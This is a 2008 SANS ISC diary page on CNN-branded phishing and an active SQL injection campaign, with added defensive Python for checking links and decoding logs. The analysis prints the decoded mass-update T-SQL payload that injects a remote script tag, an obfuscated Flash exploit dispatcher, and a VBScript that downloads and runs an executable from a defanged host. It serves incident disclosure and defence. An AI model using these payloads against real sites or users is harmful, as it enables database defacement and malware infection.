
SANS ISC: InfoSec Handlers Diary Blog - Internet Storm Center Diary 2008-08-08



'CNN - My Custom Alert'

Published: 2008-08-08
Last Updated: 2008-08-08 17:47:53 UTC
by Mari Nichols (Version: 1)
2 comment(s)

Thanks to our readers for letting us know that they are receiving a good amount of very authentic-looking phishing spam.  Although the email once again appears to be from CNN, the originating address is not even obfuscated.  ISC handler Daniel wrote a diary about the "CNN - Top Ten" Storm worm a few days ago:

isc.sans.org/diary.html

These sorts of emails have one big thing going for them: the ability to get the user to click.  The CNN brand is trusted and recognized by almost all of our users, and anyone seeing this email may not think twice about clicking on the link unless we tell them not to.  What a great opportunity for user training.  Send out a short security awareness email to your users and explain to them what is really happening.  Ask them to tell their kids too.

Far too many people are making this a very profitable way for cyber-criminals to make money.   Try to help your end users understand how to spot a fraudulent sender address, how to dissect a domain name, and how to find the real destination behind a masked URL.  Just think about all the infections and exploitations you may prevent.
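As an added example (not part of this diary), here is a small Python check that does mechanically what the training above asks users to do by eye: it pulls every link out of an HTML mail, compares the domain that the visible link text claims against the domain the href really points to, and flags links that leave the sender's domain. The message, the cnn-mail.example.net and example-tracker.net hostnames, and the crude "last two labels" domain rule are all constructed for the example; a production tool would use the Public Suffix List instead.

```python
from email.parser import Parser
from email.policy import default
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample message (not a real lure): the visible link text claims
# cnn.com, the real href points at a tracker host, and the From: domain differs again.
SAMPLE_EMAIL = """\
From: "CNN Alerts" <alerts@cnn-mail.example.net>
To: user@example.com
Subject: CNN Alerts: My Custom Alert
Content-Type: text/html; charset=us-ascii

<html><body>
<p>Your custom alert has matched a story.</p>
<p><a href="http://www.cnn.com.example-tracker.net/story.php?id=1">http://www.cnn.com/2008/story.html</a></p>
<p><a href="http://www.cnn.com/unsubscribe">Unsubscribe</a></p>
</body></html>
"""


def host_of(url):
    return (urlsplit(url).hostname or "").lower()


def registrable(host):
    """Crude last-two-labels approximation (assumption for the example; use the Public Suffix List in practice)."""
    parts = host.split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host


class LinkCollector(HTMLParser):
    """Collect (href, visible text) for every <a> in the HTML body."""

    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._text = dict(attrs).get("href"), []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def analyse_message(raw):
    """Report masked URLs (visible URL != real URL) and links that leave the sender's domain."""
    msg = Parser(policy=default).parsestr(raw)
    sender_dom = registrable(msg["From"].addresses[0].domain.lower())
    body = msg.get_body(preferencelist=("html",)).get_content()
    lc = LinkCollector()
    lc.feed(body)
    report = {"sender": sender_dom, "masked": [], "offsite": []}
    for href, text in lc.links:
        href_dom = registrable(host_of(href))
        if text.lower().startswith(("http://", "https://")) and registrable(host_of(text)) != href_dom:
            report["masked"].append((text, href))   # the visible URL lies about the destination
        if href_dom != sender_dom:
            report["offsite"].append(href)          # the link leaves the sender's own domain
    return report


if __name__ == "__main__":
    for key, value in analyse_message(SAMPLE_EMAIL).items():
        print(key, value)
```

The "masked" list is the one worth showing users: a link whose text is itself a URL but whose href goes somewhere else is the classic trick this diary describes. The "offsite" list is noisier (legitimate bulk mail often links to a different domain than it is sent from) and is better used as supporting evidence than as a verdict on its own.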

For more information see the Anti-Phishing Working Group website.

http://www.antiphishing.org/
 


More SQL Injections - very active right now

Published: 2008-08-08
Last Updated: 2008-08-08 16:40:52 UTC
by Mark Hofman (Version: 1)
5 comment(s)

Scott, one of our readers, wrote in to let us know that attempts were being made on his servers through SQL injection.  He was the first to report it and assisted with the analysis, but he was not the last: since the first report we have received several more in the last four hours or so.  There seems to be a lot of activity with this particular attack.

It looks like a repeat/variant of the attacks mentioned by Bojan here.

Overview:

w.js --- new.htm ---|--- Flash.htm ---|--- i1.html ---|--- i/f16.swf
                    |                 |--- f2.html ---|--- i/f28.swf
                    |                                 |--- i/f64.swf
                    |                                 |--- i/f115.swf
                    |                                 |--- i/f45.swf
                    |                                 |--- i/f47.swf
                    |--- 06014.htm
                    |--- yahoo.htm ---|
                    |--- office.htm --|--- rondll32.exe --- msyahoo.exe --- wsv.exe/thunder.exe
                    |--- ksx.htm -----|

The Injection:
The string being injected, as it appears in a web server log line (most of the hex has been snipped), is:

DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736------------snip------------2204445414C4C4F43436F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 302 26 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"

The hex decodes to the following T-SQL.  It opens a cursor over every text-type column (xtype 99, 35, 231 and 167 are ntext, text, nvarchar and varchar in syscolumns) of every user table (xtype='u' in sysobjects) and appends the script tag to every value that does not already carry it:

DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR
select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u'
and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="hXXp://sdo.1000mg.cn/csrss/w.js"></script><!--'' where '+@C+' not like ''%"></title><script src="hXXp://sdo.1000mg.cn/csrss/w.js"></script><!--''') FETCH NEXT FROM Table_Cursor INTO
@T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
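As an added example, not from the diary, the Python below pulls this kind of injection out of web server access logs: it URL-decodes each line, extracts the hex from CAST(0x... AS CHAR/NVARCHAR), decodes it as single-byte text or UTF-16LE depending on the declared type, and then checks the result for the cursor-over-syscolumns pattern and any <script src> it carries. The log lines are constructed (the attack lines re-encode the decoded payload above, keeping the defanged hXXp URL). The NVARCHAR variant is included as a caveat: related campaigns hex-encoded UTF-16LE text, and a decoder that assumes one byte per character shows such a payload as text interleaved with NUL bytes and misses the markers.

```python
import re
import urllib.parse

# Constructed sample: the decoded cursor payload from the diary (script URL kept
# defanged as hXXp, exactly as printed above), re-encoded the way the attack
# sends it: hex inside CAST(0x... AS CHAR(4000)) wrapped in DECLARE/EXEC.
PAYLOAD_SQL = (
    "DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR "
    "select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' "
    "and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor "
    "FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) "
    "BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''\"></title>"
    "<script src=\"hXXp://sdo.1000mg.cn/csrss/w.js\"></script><!--'' "
    "where '+@C+' not like ''%\"></title>"
    "<script src=\"hXXp://sdo.1000mg.cn/csrss/w.js\"></script><!--''') "
    "FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor"
)


def encode_attack(sql, nvarchar=False):
    """Constructed helper: wrap SQL the way the injector does, so the sample log is realistic.

    The CHAR variant hex-encodes single-byte text; the NVARCHAR variant seen in
    related campaigns hex-encodes UTF-16LE, which is why a decoder must handle both.
    """
    raw = sql.encode("utf-16-le") if nvarchar else sql.encode("ascii")
    typ = "NVARCHAR" if nvarchar else "CHAR"
    stmt = f"DECLARE @S {typ}(4000);SET @S=CAST(0x{raw.hex().upper()} AS {typ}(4000));EXEC(@S);"
    return urllib.parse.quote(stmt, safe="()=;@")


SAMPLE_LOG = [  # constructed Apache-style lines; only the second and third are attacks
    '10.0.0.5 - - [08/Aug/2008:10:01:22 +0000] "GET /page.asp?id=1 HTTP/1.1" 200 5120 "-" "Mozilla/4.0"',
    '10.0.0.9 - - [08/Aug/2008:10:02:07 +0000] "GET /page.asp?id=1;' + encode_attack(PAYLOAD_SQL)
    + ' HTTP/1.1" 302 26 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"',
    '10.0.0.9 - - [08/Aug/2008:10:02:09 +0000] "GET /page.asp?id=1;' + encode_attack(PAYLOAD_SQL, nvarchar=True)
    + ' HTTP/1.1" 500 0 "-" "Mozilla/4.0"',
]

# CAST(0x<hex> AS CHAR|NCHAR|VARCHAR|NVARCHAR ...): the signature of this injector family
CAST_HEX = re.compile(r"CAST\s*\(\s*0x([0-9a-f]+)\s+AS\s+(n?(?:var)?char)", re.I)
SCRIPT_SRC = re.compile(r'<script\s+src="([^"]+)"', re.I)
# Tokens that together mean "walk every text column of every user table and append to it"
CURSOR_MARKERS = ("sysobjects", "syscolumns", "table_cursor", "@@fetch_status", "update [")


def decode_hex_payload(hex_digits, sql_type):
    raw = bytes.fromhex(hex_digits)
    if sql_type.lower().startswith("n"):          # N* types carry UTF-16LE
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("latin-1")                  # CHAR/VARCHAR: one byte per character


def analyse_line(line):
    """Return a finding for a log line carrying a hex-encoded CAST/EXEC payload, else None."""
    m = CAST_HEX.search(urllib.parse.unquote(line))
    if not m:
        return None
    sql = decode_hex_payload(m.group(1), m.group(2))
    low = sql.lower()
    return {
        "sql": sql,
        "mass_update": all(marker in low for marker in CURSOR_MARKERS),
        "script_src": SCRIPT_SRC.findall(sql),
        "encoding": "utf-16-le" if m.group(2).lower().startswith("n") else "single-byte",
    }


def scan(lines):
    """(line index, finding) for every line that carries a decodable payload."""
    results = []
    for i, line in enumerate(lines):
        finding = analyse_line(line)
        if finding:
            results.append((i, finding))
    return results


if __name__ == "__main__":
    for i, f in scan(SAMPLE_LOG):
        print(i, f["encoding"], f["mass_update"], f["script_src"])
```

Decoding the hex rather than matching on CAST/EXEC alone is what turns a log hit into something actionable: the decoded SQL tells you which script URL was appended, and therefore what to search your tables for when cleaning up.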

Various types of sites seem to be hit at the moment.  From the reports we've had it is not specific to ASP, CFM or PHP, but we don't have a lot of information on this just yet.

Next:

A user visiting an injected site will load w.js which, if the browser language is English, pulls down new.htm.  new.htm reports to a stats site and has a number of iframes that grab the next set of htm pages: Flash.htm, 06014.htm, yahoo.htm, office.htm and ksx.htm.   Flash.htm checks whether you are using IE or Firefox and selects either i1.html or f2.html.

i1.html & f2.html

These files contain the following JavaScript:

<script type="text/javascript" src="swfobject.js"></script>
<div id="flashcontent">111</div><div id="flashversion">222</div>
<script type="text/javascript">
c="118,97,114,32,118,101,114,115,105,111----snip----116,46,119,114,105,116,101,40,34,34,41";c=eval("String.fromCharCode("+c+")");document.write("<script>"+c+"<\/script>");
</script>

This expands out to:

var version=deconcept.SWFObjectUtil.getPlayerVersion();
if(version['major']==9){
  document.getElementById('flashversion').innerHTML="";
  if(version['rev']==115){var so=new SWFObject("./f115.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}
  else if(version['rev']==64){var so=new SWFObject("./f64.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}
  else if(version['rev']==47){var so=new SWFObject("./f47.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}
  else if(version['rev']==45){var so=new SWFObject("./f45.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}
  else if(version['rev']==28){var so=new SWFObject("./f28.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}
  else if(version['rev']==16){var so=new SWFObject("./f16.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}
  else if(version['rev']>=124){if(document.getElementById){document.getElementById('flashversion').innerHTML=""}}
};
document.write("")

So depending on the Flash Player revision and the browser a different file is tried (the IE version loads the i*.swf files, e.g. i64.swf, in place of the f*.swf files).   Detection for these is poor: at VirusTotal 9 of 36 engines flag the IE file as malicious and 10 of 36 flag the Firefox file.
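As an added example that is not part of the diary, the Python below does this decoding statically rather than by running the page's eval: it finds the quoted list of character codes, rebuilds the script exactly as String.fromCharCode would, and then reads the version['rev'] branches out of it to produce the revision-to-.swf table. The sample page is constructed from a shortened copy of the decoded script above; the regular expressions assume the one-branch-per-revision shape shown there and would need adjusting for a differently structured dispatcher.

```python
import re

# Constructed sample: a shortened form of the decoded version-dispatch script shown
# above, re-encoded as the comma-separated character codes that i1.html carries.
DISPATCH_JS = (
    "var version=deconcept.SWFObjectUtil.getPlayerVersion();"
    "if(version['major']==9){"
    "if(version['rev']==115){var so=new SWFObject(\"./f115.swf\",\"mymovie\",\"0.1\",\"0.1\",\"9\",\"#000000\");so.write(\"flashcontent\")}"
    "else if(version['rev']==64){var so=new SWFObject(\"./f64.swf\",\"mymovie\",\"0.1\",\"0.1\",\"9\",\"#000000\");so.write(\"flashcontent\")}"
    "else if(version['rev']==47){var so=new SWFObject(\"./f47.swf\",\"mymovie\",\"0.1\",\"0.1\",\"9\",\"#000000\");so.write(\"flashcontent\")}"
    "else if(version['rev']>=124){document.getElementById('flashversion').innerHTML=\"\"}"
    "};document.write(\"\")"
)
ENCODED_JS = ",".join(str(ord(ch)) for ch in DISPATCH_JS)
SAMPLE_HTML = (
    '<script type="text/javascript" src="swfobject.js"></script>\n'
    '<div id="flashcontent">111</div><div id="flashversion">222</div>\n'
    '<script type="text/javascript">\n'
    'c="' + ENCODED_JS + '";c=eval("String.fromCharCode("+c+")");'
    'document.write("<script>"+c+"<\\/script>");\n'
    '</script>'
)

# name="12,34,56";  a string literal that is nothing but decimal character codes
CHARCODE_VAR = re.compile(r'(\w+)\s*=\s*"((?:\d+,)+\d+)"\s*;')
# one if / else-if arm testing version['rev'], with its brace-delimited body
BRANCH = re.compile(r"version\['rev'\]\s*(==|>=|<=|>|<)\s*(\d+)\)\s*\{(.*?)\}\s*(?=else|\};|$)", re.S)
SWF = re.compile(r'new\s+SWFObject\("([^"]+)"')


def decode_charcodes(html):
    """Statically rebuild what eval(String.fromCharCode(...)) would produce; never run the page's eval."""
    m = CHARCODE_VAR.search(html)
    if not m:
        return None
    return "".join(chr(int(n)) for n in m.group(2).split(","))


def extract_dispatch(js):
    """Map (comparison, Flash Player revision) -> .swf served, or None where the arm loads nothing."""
    table = {}
    for op, rev, body in BRANCH.findall(js):
        swf = SWF.search(body)
        table[(op, int(rev))] = swf.group(1) if swf else None
    return table


def exploit_for(table, rev):
    """Which file a visitor running 9.0.<rev> would receive, walking the arms in page order like the browser."""
    for (op, n), swf in table.items():
        hit = {"==": rev == n, ">=": rev >= n, "<=": rev <= n, ">": rev > n, "<": rev < n}[op]
        if hit:
            return swf
    return None


if __name__ == "__main__":
    dispatch = extract_dispatch(decode_charcodes(SAMPLE_HTML))
    for key, swf in dispatch.items():
        print(key, swf)
```

The table is the useful output for responders: it lists exactly which Flash Player revisions the kit targets, so you can tell at a glance whether a given revision on your desktops gets an exploit or falls through to the do-nothing arm. Keeping the decoding static matters because the obfuscation is only a character-code list; there is no reason to hand attacker-controlled JavaScript to an interpreter to read it.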

yahoo.htm

The yahoo.htm file runs a VBScript that downloads rondll32.exe through an ActiveX object, saves it as c:\msyahoo.exe and then executes it:

<object classid='clsid:24F3EAD6-8B87-4C1A-97DA-71C126BDA08F' id='test'></object>
<script language='vbscript'>
test.GetFile "hXXp://www.XXXXX.com/XXXX/rondll32.exe","c:\\msyahoo.exe",5,1,"tiany"
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run "c:\\msyahoo.exe"
</script>

Office.htm

Attempts to create ActiveX objects and pulls down the same rondll32.exe.  It looks like rondll32.exe in turn pulls down thunder.exe and wsv.exe.

ksx.htm

Attempts to get the browser to load the rondll32.exe file.

Detection for rondll32.exe is good, with most AV products catching this one.

06014.htm

This file was unavailable at the time I checked.

 

These attacks are happening right now.  The people that reported them identified the attacks in their log files and IDS alerts; it is good to see that people are checking their logs.   Currently about 4000 sites are infected, but mostly with the older version of w.js and a different go-to site.  This round looks like it has just started.  We'll keep an eye on how this develops.

 

Cheers.

Mark - Shearwater

Keywords: sql injection